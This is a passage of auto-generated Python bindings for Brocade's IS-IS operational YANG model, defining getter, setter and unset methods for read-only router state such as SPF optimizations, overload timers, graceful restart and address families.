'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__pspf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_pspf_enabled(self):
self.__pspf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_ispf_enabled(self):
"""
Getter method for ispf_enabled, mapped from YANG variable /isis_state/router_isis_config/ispf_enabled (isis-status)
YANG Description: Whether Incremental SPF optimizations are enabled
"""
return self.__ispf_enabled
def _set_ispf_enabled(self, v, load=False):
"""
Setter method for ispf_enabled, mapped from YANG variable /isis_state/router_isis_config/ispf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_ispf_enabled is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_ispf_enabled() directly.
YANG Description: Whether Incremental SPF optimizations are enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ispf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__ispf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_ispf_enabled(self):
self.__ispf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="ispf-enabled", rest_name="ispf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_istct_spf_enabled(self):
"""
Getter method for istct_spf_enabled, mapped from YANG variable /isis_state/router_isis_config/istct_spf_enabled (isis-status)
YANG Description: Whether incremental shortcut LSP SPF optimization is enabled
"""
return self.__istct_spf_enabled
def _set_istct_spf_enabled(self, v, load=False):
"""
Setter method for istct_spf_enabled, mapped from YANG variable /isis_state/router_isis_config/istct_spf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_istct_spf_enabled is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_istct_spf_enabled() directly.
YANG Description: Whether incremental shortcut LSP SPF optimization is enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """istct_spf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__istct_spf_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_istct_spf_enabled(self):
self.__istct_spf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="istct-spf-enabled", rest_name="istct-spf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_overload_state(self):
"""
Getter method for overload_state, mapped from YANG variable /isis_state/router_isis_config/overload_state (isis-status)
YANG Description: Whether the Overload bit is set, indicating to other ISs that this IS should not be used
"""
return self.__overload_state
def _set_overload_state(self, v, load=False):
"""
Setter method for overload_state, mapped from YANG variable /isis_state/router_isis_config/overload_state (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_state is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_overload_state() directly.
YANG Description: Whether the Overload bit is set, indicating to other ISs that this IS should not be used
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_state must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__overload_state = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_state(self):
self.__overload_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-state", rest_name="overload-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
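# Reads go through the _get_* methods, which return the YANGDynClass
# wrapper itself; the wrapper subclasses its base type, so it compares
# equal to a plain value, e.g. obj._get_overload_state() == u'is-disabled'
# (hedged: the actual value depends on device state).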
def _get_overload_startup_time(self):
"""
Getter method for overload_startup_time, mapped from YANG variable /isis_state/router_isis_config/overload_startup_time (uint32)
YANG Description: Time in seconds to stay temporarily in the overloaded state after a reboot
"""
return self.__overload_startup_time
def _set_overload_startup_time(self, v, load=False):
"""
Setter method for overload_startup_time, mapped from YANG variable /isis_state/router_isis_config/overload_startup_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_startup_time is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_overload_startup_time() directly.
YANG Description: Time in seconds to stay temporarily in the overloaded state after a reboot
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_startup_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__overload_startup_time = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_startup_time(self):
self.__overload_startup_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-startup-time", rest_name="overload-startup-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
def _get_overload_wait_on_bgp(self):
"""
Getter method for overload_wait_on_bgp, mapped from YANG variable /isis_state/router_isis_config/overload_wait_on_bgp (isis-status)
YANG Description: Whether the IS waits temporarily in overload-state until BGP converges on reboot
"""
return self.__overload_wait_on_bgp
def _set_overload_wait_on_bgp(self, v, load=False):
"""
Setter method for overload_wait_on_bgp, mapped from YANG variable /isis_state/router_isis_config/overload_wait_on_bgp (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_wait_on_bgp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_wait_on_bgp() directly.
YANG Description: Whether the IS waits temporarily in overload-state until BGP converges on reboot
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_wait_on_bgp must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__overload_wait_on_bgp = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_wait_on_bgp(self):
self.__overload_wait_on_bgp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="overload-wait-on-bgp", rest_name="overload-wait-on-bgp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_overload_bgp_wait_time(self):
"""
Getter method for overload_bgp_wait_time, mapped from YANG variable /isis_state/router_isis_config/overload_bgp_wait_time (uint32)
YANG Description: Maximum time in seconds to wait for BGP convergence
"""
return self.__overload_bgp_wait_time
def _set_overload_bgp_wait_time(self, v, load=False):
"""
Setter method for overload_bgp_wait_time, mapped from YANG variable /isis_state/router_isis_config/overload_bgp_wait_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_overload_bgp_wait_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_overload_bgp_wait_time() directly.
YANG Description: Maximum time in seconds to wait for BGP convergence
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """overload_bgp_wait_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__overload_bgp_wait_time = t
if hasattr(self, '_set'):
self._set()
def _unset_overload_bgp_wait_time(self):
self.__overload_bgp_wait_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="overload-bgp-wait-time", rest_name="overload-bgp-wait-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
def _get_enable_code_assertions(self):
"""
Getter method for enable_code_assertions, mapped from YANG variable /isis_state/router_isis_config/enable_code_assertions (isis-status)
YANG Description: Enable code-assertions
"""
return self.__enable_code_assertions
def _set_enable_code_assertions(self, v, load=False):
"""
Setter method for enable_code_assertions, mapped from YANG variable /isis_state/router_isis_config/enable_code_assertions (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_code_assertions is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_code_assertions() directly.
YANG Description: Enable code-assertions
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_code_assertions must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__enable_code_assertions = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_code_assertions(self):
self.__enable_code_assertions = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="enable-code-assertions", rest_name="enable-code-assertions", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_graceful_restart_helper(self):
"""
Getter method for graceful_restart_helper, mapped from YANG variable /isis_state/router_isis_config/graceful_restart_helper (isis-status)
YANG Description: Enable graceful restart helper support
"""
return self.__graceful_restart_helper
def _set_graceful_restart_helper(self, v, load=False):
"""
Setter method for graceful_restart_helper, mapped from YANG variable /isis_state/router_isis_config/graceful_restart_helper (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_graceful_restart_helper is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_graceful_restart_helper() directly.
YANG Description: Enable graceful restart helper support
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """graceful_restart_helper must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__graceful_restart_helper = t
if hasattr(self, '_set'):
self._set()
def _unset_graceful_restart_helper(self):
self.__graceful_restart_helper = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="graceful-restart-helper", rest_name="graceful-restart-helper", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_isis_hostname_enabled(self):
"""
Getter method for isis_hostname_enabled, mapped from YANG variable /isis_state/router_isis_config/isis_hostname_enabled (isis-status)
YANG Description: Whether IS-IS hostname support is enabled
"""
return self.__isis_hostname_enabled
def _set_isis_hostname_enabled(self, v, load=False):
"""
Setter method for isis_hostname_enabled, mapped from YANG variable /isis_state/router_isis_config/isis_hostname_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_isis_hostname_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_isis_hostname_enabled() directly.
YANG Description: Whether IS-IS hostname support is enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """isis_hostname_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__isis_hostname_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_isis_hostname_enabled(self):
self.__isis_hostname_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="isis-hostname-enabled", rest_name="isis-hostname-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_isis_system_info(self):
"""
Getter method for isis_system_info, mapped from YANG variable /isis_state/router_isis_config/isis_system_info (container)
YANG Description: Information specific to a single instance of the IS-IS protocol running on a router
"""
return self.__isis_system_info
def _set_isis_system_info(self, v, load=False):
"""
Setter method for isis_system_info, mapped from YANG variable /isis_state/router_isis_config/isis_system_info (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_isis_system_info is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_isis_system_info() directly.
YANG Description: Information specific to a single instance of the IS-IS protocol running on a router
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """isis_system_info must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__isis_system_info = t
if hasattr(self, '_set'):
self._set()
def _unset_isis_system_info(self):
self.__isis_system_info = YANGDynClass(base=isis_system_info.isis_system_info, is_container='container', presence=False, yang_name="isis-system-info", rest_name="isis-system-info", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-system-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_log_handler(self):
"""
Getter method for log_handler, mapped from YANG variable /isis_state/router_isis_config/log_handler (container)
YANG Description: IS-IS logging handler
"""
return self.__log_handler
def _set_log_handler(self, v, load=False):
"""
Setter method for log_handler, mapped from YANG variable /isis_state/router_isis_config/log_handler (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_log_handler is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_log_handler() directly.
YANG Description: IS-IS logging handler
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """log_handler must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__log_handler = t
if hasattr(self, '_set'):
self._set()
def _unset_log_handler(self):
self.__log_handler = YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_is_address_family_v4(self):
"""
Getter method for is_address_family_v4, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v4 (container)
YANG Description: ISIS ipv4 address family
"""
return self.__is_address_family_v4
def _set_is_address_family_v4(self, v, load=False):
"""
Setter method for is_address_family_v4, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v4 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_address_family_v4 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_address_family_v4() directly.
YANG Description: ISIS ipv4 address family
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_address_family_v4 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__is_address_family_v4 = t
if hasattr(self, '_set'):
self._set()
def _unset_is_address_family_v4(self):
self.__is_address_family_v4 = YANGDynClass(base=is_address_family_v4.is_address_family_v4, is_container='container', presence=False, yang_name="is-address-family-v4", rest_name="is-address-family-v4", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v4', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_is_address_family_v6(self):
"""
Getter method for is_address_family_v6, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v6 (container)
YANG Description: ISIS ipv6 address family
"""
return self.__is_address_family_v6
def _set_is_address_family_v6(self, v, load=False):
"""
Setter method for is_address_family_v6, mapped from YANG variable /isis_state/router_isis_config/is_address_family_v6 (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_is_address_family_v6 is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_is_address_family_v6() directly.
YANG Description: ISIS ipv6 address family
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """is_address_family_v6 must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)""",
})
self.__is_address_family_v6 = t
if hasattr(self, '_set'):
self._set()
def _unset_is_address_family_v6(self):
self.__is_address_family_v6 = YANGDynClass(base=is_address_family_v6.is_address_family_v6, is_container='container', presence=False, yang_name="is-address-family-v6", rest_name="is-address-family-v6", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-address-family-v6', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
def _get_reverse_metric(self):
"""
Getter method for reverse_metric, mapped from YANG variable /isis_state/router_isis_config/reverse_metric (container)
YANG Description: IS-IS system level reverse-metric configuration
"""
return self.__reverse_metric
def _set_reverse_metric(self, v, load=False):
"""
Setter method for reverse_metric, mapped from YANG variable /isis_state/router_isis_config/reverse_metric (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_reverse_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_reverse_metric() directly.
YANG Description: IS-IS system level reverse-metric configuration
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
